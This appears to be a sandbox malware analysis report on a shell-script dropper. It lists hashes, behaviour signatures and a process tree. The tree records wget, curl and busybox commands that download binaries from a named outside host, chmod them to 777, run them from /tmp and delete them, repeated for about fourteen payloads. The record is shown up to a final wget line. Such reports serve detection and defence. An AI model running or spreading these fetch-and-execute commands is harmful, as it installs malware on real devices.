Analysis
- max time kernel: 74s
- max time network: 103s
- platform: debian-9_mipsel
- resource: debian9-mipsel-20240611-en
- resource tags: arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
- submitted: 28/10/2024, 01:45
Static task
- static1
Behavioral tasks
- behavioral1: sample 585ec47054d0df1fa327009d4f6a78ab7ec3a12a37dab61e9cef078ea9bb8f14.sh, resource ubuntu1804-amd64-20240611-en
- behavioral2: sample 585ec47054d0df1fa327009d4f6a78ab7ec3a12a37dab61e9cef078ea9bb8f14.sh, resource debian9-armhf-20240611-en
- behavioral3: sample 585ec47054d0df1fa327009d4f6a78ab7ec3a12a37dab61e9cef078ea9bb8f14.sh, resource debian9-mipsbe-20240611-en
- behavioral4: sample 585ec47054d0df1fa327009d4f6a78ab7ec3a12a37dab61e9cef078ea9bb8f14.sh, resource debian9-mipsel-20240611-en
General
- Target: 585ec47054d0df1fa327009d4f6a78ab7ec3a12a37dab61e9cef078ea9bb8f14.sh
- Size: 10KB
- MD5: e0055200def5fe48ba452522862fb712
- SHA1: bf3781538ff791585c1d0eeb9df035f072f3ed54
- SHA256: 585ec47054d0df1fa327009d4f6a78ab7ec3a12a37dab61e9cef078ea9bb8f14
- SHA512: 0a89d5b349924086f77fe4930ad881c0ddcf5375dd5db5c81b1d798afc0331cd20644453475991f75036346f3fc69ed84474662935d60c0d22262aebdd9e996b
- SSDEEP: 192:QpRUAsXNs1yeJwIYzVj8g0e4qS5FyeJwIhg0e4qSzupRUAsX8:QpRUDXNs1yeJwIYzVj8g0BqS5FyeJwI2
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTP, 28 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  Process: chmod. PIDs: 741, 749, 756, 777, 802, 822, 829, 869, 876, 883, 890, 897, 904, 911, 918, 925, 932, 939, 946, 953, 960, 967, 974, 981, 988, 995, 1002, 1009
- Executes dropped EXE (28 IoCs)
  Each dropped file (the process name is the file's basename) and the PIDs under which it ran:
  /tmp/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a: 742, 989
  /tmp/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux: 750, 1003
  /tmp/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC: 757, 1010
  /tmp/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e: 778, 996
  /tmp/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp: 804, 933
  /tmp/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg: 823, 940
  /tmp/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq: 830, 919
  /tmp/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z: 870, 926
  /tmp/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3: 877, 961
  /tmp/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA: 884, 968
  /tmp/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq: 891, 975
  /tmp/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT: 898, 982
  /tmp/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz: 905, 947
  /tmp/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE: 912, 954
- Reads runtime system information (28 IoCs; the heading for this block did not survive extraction, its name is taken from the tag carried by the curl processes in the tree below)
  Description: File opened for reading. IoC: /proc/sys/crypto/fips_enabled. Process: curl (28 occurrences).
- System Network Configuration Discovery (1 TTP, 64 IoCs)
  Adversaries may gather information about the network configuration of a system.
  curl PIDs: 746, 753, 764, 791, 815, 826, 833, 873, 880, 894, 901, 908, 922, 929, 936, 943, 950, 964, 971, 978, 985, 992, 999, 1006
  busybox PIDs: 737, 748, 755, 799, 821, 882, 889, 896, 903, 910, 917, 924, 938, 945, 952, 959, 980, 987, 1001, 1008
  wget PIDs: 715, 759, 783, 825, 832, 879, 893, 900, 907, 914, 921, 942, 949, 956, 963, 970, 977, 984, 998, 1005
- Writes file to tmp directory (28 IoCs)
  Malware often drops required files in the /tmp directory.
  Description: File opened for modification. Process: curl. Each of the following paths appears twice:
  /tmp/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a
  /tmp/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux
  /tmp/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC
  /tmp/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e
  /tmp/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp
  /tmp/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg
  /tmp/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq
  /tmp/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z
  /tmp/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3
  /tmp/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA
  /tmp/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq
  /tmp/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT
  /tmp/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz
  /tmp/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE
Processes
Process tree, in the order reported. Depth 1 is the submitted script; depth 2 entries are its direct children. Signature abbreviations: SNCD = System Network Configuration Discovery, RRSI = Reads runtime system information, WFT = Writes file to tmp directory, FDPM = File and Directory Permissions Modification, EDE = Executes dropped EXE.

| PID | Depth | Process | Command line | Signatures |
|---|---|---|---|---|
| 710 | 1 | /tmp/585ec47054d0df1fa327009d4f6a78ab7ec3a12a37dab61e9cef078ea9bb8f14.sh | /tmp/585ec47054d0df1fa327009d4f6a78ab7ec3a12a37dab61e9cef078ea9bb8f14.sh | |
| 712 | 2 | /bin/rm | /bin/rm bins.sh | |
| 715 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a | SNCD |
| 732 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a | RRSI, WFT |
| 737 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a | SNCD |
| 741 | 2 | /bin/chmod | chmod 777 abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a | FDPM |
| 742 | 2 | /tmp/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a | ./abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a | EDE |
| 744 | 2 | /bin/rm | rm abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a | |
| 745 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux | |
| 746 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux | RRSI, SNCD, WFT |
| 748 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux | SNCD |
| 749 | 2 | /bin/chmod | chmod 777 MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux | FDPM |
| 750 | 2 | /tmp/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux | ./MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux | EDE |
| 751 | 2 | /bin/rm | rm MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux | |
| 752 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC | |
| 753 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC | RRSI, SNCD, WFT |
| 755 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC | SNCD |
| 756 | 2 | /bin/chmod | chmod 777 xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC | FDPM |
| 757 | 2 | /tmp/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC | ./xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC | EDE |
| 758 | 2 | /bin/rm | rm xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC | |
| 759 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e | SNCD |
| 764 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e | RRSI, SNCD, WFT |
| 772 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e | |
| 777 | 2 | /bin/chmod | chmod 777 mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e | FDPM |
| 778 | 2 | /tmp/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e | ./mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e | EDE |
| 781 | 2 | /bin/rm | rm mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e | |
| 783 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp | SNCD |
| 791 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp | RRSI, SNCD, WFT |
| 799 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp | SNCD |
| 802 | 2 | /bin/chmod | chmod 777 XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp | FDPM |
| 804 | 2 | /tmp/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp | ./XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp | EDE |
| 810 | 2 | /bin/rm | rm XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp | |
| 811 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg | |
| 815 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg | RRSI, SNCD, WFT |
| 821 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg | SNCD |
| 822 | 2 | /bin/chmod | chmod 777 OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg | FDPM |
| 823 | 2 | /tmp/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg | ./OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg | EDE |
| 824 | 2 | /bin/rm | rm OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg | |
| 825 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq | SNCD |
| 826 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq | RRSI, SNCD, WFT |
| 828 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq | |
| 829 | 2 | /bin/chmod | chmod 777 TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq | FDPM |
| 830 | 2 | /tmp/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq | ./TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq | EDE |
| 831 | 2 | /bin/rm | rm TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq | |
| 832 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z | SNCD |
| 833 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z | RRSI, SNCD, WFT |
| 835 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z | |
| 869 | 2 | /bin/chmod | chmod 777 LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z | FDPM |
| 870 | 2 | /tmp/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z | ./LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z | EDE |
| 871 | 2 | /bin/rm | rm LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z | |
| 872 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 | |
| 873 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 | RRSI, SNCD, WFT |
| 875 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 | |
| 876 | 2 | /bin/chmod | chmod 777 thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 | FDPM |
| 877 | 2 | /tmp/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 | ./thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 | EDE |
| 878 | 2 | /bin/rm | rm thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 | |
| 879 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA | SNCD |
| 880 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA | RRSI, SNCD, WFT |
| 882 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA | SNCD |
| 883 | 2 | /bin/chmod | chmod 777 bUV3un6NWptZDauv3O6MxhnE386jPFrhdA | FDPM |
| 884 | 2 | /tmp/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA | ./bUV3un6NWptZDauv3O6MxhnE386jPFrhdA | EDE |
| 885 | 2 | /bin/rm | rm bUV3un6NWptZDauv3O6MxhnE386jPFrhdA | |
| 886 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq | |
| 887 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq | RRSI, WFT |
| 889 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq | SNCD |
| 890 | 2 | /bin/chmod | chmod 777 CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq | FDPM |
| 891 | 2 | /tmp/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq | ./CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq | EDE |
| 892 | 2 | /bin/rm | rm CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq | |
| 893 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT | SNCD |
| 894 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT | RRSI, SNCD, WFT |
| 896 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT | SNCD |
| 897 | 2 | /bin/chmod | chmod 777 tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT | FDPM |
| 898 | 2 | /tmp/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT | ./tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT | EDE |
| 899 | 2 | /bin/rm | rm tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT | |
| 900 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz | SNCD |
| 901 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz | RRSI, SNCD, WFT |
| 903 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz | SNCD |
| 904 | 2 | /bin/chmod | chmod 777 viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz | FDPM |
| 905 | 2 | /tmp/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz | ./viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz | EDE |
| 906 | 2 | /bin/rm | rm viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz | |
| 907 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE | SNCD |
| 908 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE | RRSI, SNCD, WFT |
| 910 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE | SNCD |
| 911 | 2 | /bin/chmod | chmod 777 WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE | FDPM |
| 912 | 2 | /tmp/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE | ./WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE | EDE |
| 913 | 2 | /bin/rm | rm WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE | |
| 914 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq | SNCD |
| 915 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq | RRSI, WFT |
| 917 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq | SNCD |
| 918 | 2 | /bin/chmod | chmod 777 TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq | FDPM |
| 919 | 2 | /tmp/TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq | ./TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq | EDE |
| 920 | 2 | /bin/rm | rm TJSNIMAW77DMXYrZaJLuvcZsxgxfMTH4iq | |
| 921 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z | SNCD |
| 922 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z | RRSI, SNCD, WFT |
| 924 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z | SNCD |
| 925 | 2 | /bin/chmod | chmod 777 LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z | FDPM |
| 926 | 2 | /tmp/LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z | ./LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z | EDE |
| 927 | 2 | /bin/rm | rm LllyFNVEWFL5gyfixNGScRRr2aaRmfzJ2z | |
| 928 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp | |
| 929 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp | RRSI, SNCD, WFT |
| 931 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp | |
| 932 | 2 | /bin/chmod | chmod 777 XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp | FDPM |
| 933 | 2 | /tmp/XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp | ./XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp | EDE |
| 934 | 2 | /bin/rm | rm XjHekC2k4HVlHihwcWZ1n3dq1hgzdFQ8hp | |
| 935 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg | |
| 936 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg | RRSI, SNCD, WFT |
| 938 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg | SNCD |
| 939 | 2 | /bin/chmod | chmod 777 OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg | FDPM |
| 940 | 2 | /tmp/OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg | ./OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg | EDE |
| 941 | 2 | /bin/rm | rm OF8BVqgclfW1PJc5s0Flf7SDsAO86HDTTg | |
| 942 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz | SNCD |
| 943 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz | RRSI, SNCD, WFT |
| 945 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz | SNCD |
| 946 | 2 | /bin/chmod | chmod 777 viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz | FDPM |
| 947 | 2 | /tmp/viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz | ./viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz | EDE |
| 948 | 2 | /bin/rm | rm viedSucrMlMzSd88OgzDJiQT6ZsMmiGMoz | |
| 949 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE | SNCD |
| 950 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE | RRSI, SNCD, WFT |
| 952 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE | SNCD |
| 953 | 2 | /bin/chmod | chmod 777 WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE | FDPM |
| 954 | 2 | /tmp/WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE | ./WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE | EDE |
| 955 | 2 | /bin/rm | rm WaLY34plIU7YtGxZXCiNpMlrAdCofNvDiE | |
| 956 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 | SNCD |
| 957 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 | RRSI, WFT |
| 959 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 | SNCD |
| 960 | 2 | /bin/chmod | chmod 777 thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 | FDPM |
| 961 | 2 | /tmp/thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 | ./thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 | EDE |
| 962 | 2 | /bin/rm | rm thJgPz44pGeijoAzwoLvGC6tTm5uuQl7P3 | |
| 963 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA | SNCD |
| 964 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA | RRSI, SNCD, WFT |
| 966 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA | |
| 967 | 2 | /bin/chmod | chmod 777 bUV3un6NWptZDauv3O6MxhnE386jPFrhdA | FDPM |
| 968 | 2 | /tmp/bUV3un6NWptZDauv3O6MxhnE386jPFrhdA | ./bUV3un6NWptZDauv3O6MxhnE386jPFrhdA | EDE |
| 969 | 2 | /bin/rm | rm bUV3un6NWptZDauv3O6MxhnE386jPFrhdA | |
| 970 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq | SNCD |
| 971 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq | RRSI, SNCD, WFT |
| 973 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq | |
| 974 | 2 | /bin/chmod | chmod 777 CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq | FDPM |
| 975 | 2 | /tmp/CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq | ./CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq | EDE |
| 976 | 2 | /bin/rm | rm CnBlafq12e37hRkYXCoU6lB1CK2opVyzyq | |
| 977 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT | SNCD |
| 978 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT | RRSI, SNCD, WFT |
| 980 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT | SNCD |
| 981 | 2 | /bin/chmod | chmod 777 tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT | FDPM |
| 982 | 2 | /tmp/tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT | ./tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT | EDE |
| 983 | 2 | /bin/rm | rm tGEXJfnMTTL5fwPXko22GPSlHQoudOmUdT | |
| 984 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a | SNCD |
| 985 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a | RRSI, SNCD, WFT |
| 987 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a | SNCD |
| 988 | 2 | /bin/chmod | chmod 777 abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a | FDPM |
| 989 | 2 | /tmp/abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a | ./abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a | EDE |
| 990 | 2 | /bin/rm | rm abDE33kAXFagig5B7HnpBL7GpRUkCmtz0a | |
| 991 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e | |
| 992 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e | RRSI, SNCD, WFT |
| 994 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e | |
| 995 | 2 | /bin/chmod | chmod 777 mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e | FDPM |
| 996 | 2 | /tmp/mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e | ./mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e | EDE |
| 997 | 2 | /bin/rm | rm mMygXGib6v4yTAJ7QY1yzl9hQ0PYv76O9e | |
| 998 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux | SNCD |
| 999 | 2 | /usr/bin/curl | curl -O http://conn.masjesu.zip/bins/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux | RRSI, SNCD, WFT |
| 1001 | 2 | /bin/busybox | /bin/busybox wget http://conn.masjesu.zip/bins/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux | SNCD |
| 1002 | 2 | /bin/chmod | chmod 777 MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux | FDPM |
| 1003 | 2 | /tmp/MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux | ./MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux | EDE |
| 1004 | 2 | /bin/rm | rm MDdj7cLxgWQM7z5GA44BUmRNEm8BrPbxux | |
| 1005 | 2 | /usr/bin/wget | wget http://conn.masjesu.zip/bins/xTM3nZ4ZFxFdtvhc8CYbWBRHjGteR2ZEZC | SNCD |
